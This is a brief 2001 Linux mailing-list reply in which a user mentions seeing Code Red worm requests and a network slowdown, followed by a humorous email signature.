[Gllug] New Code Red /default.ida?XXXXXXXXXXXX

Axel Segebrecht alexander at smatrix.de
Sun Aug 5 22:32:59 UTC 2001

now that you are mentioning it... had several 'attacks' and noticed
a slow down in speed... hmm - grrrrrrrrrrrrrr!!!!!!!

never mind - let's all go and call the g.busters then

rg, Axel Segebrecht
Me = http://smatrix.de/index.html
Radio = http://213.123.256.54:8000/

--
"reality? what reality!"

"Sometimes," continued Gallagher, "all the storage capacity in the world
isn't enough to make a computer feel good about itself."

"I've been here all morning and my heart's only beaten six times!"

Gllug mailing list  -  Gllug at linux.co.uk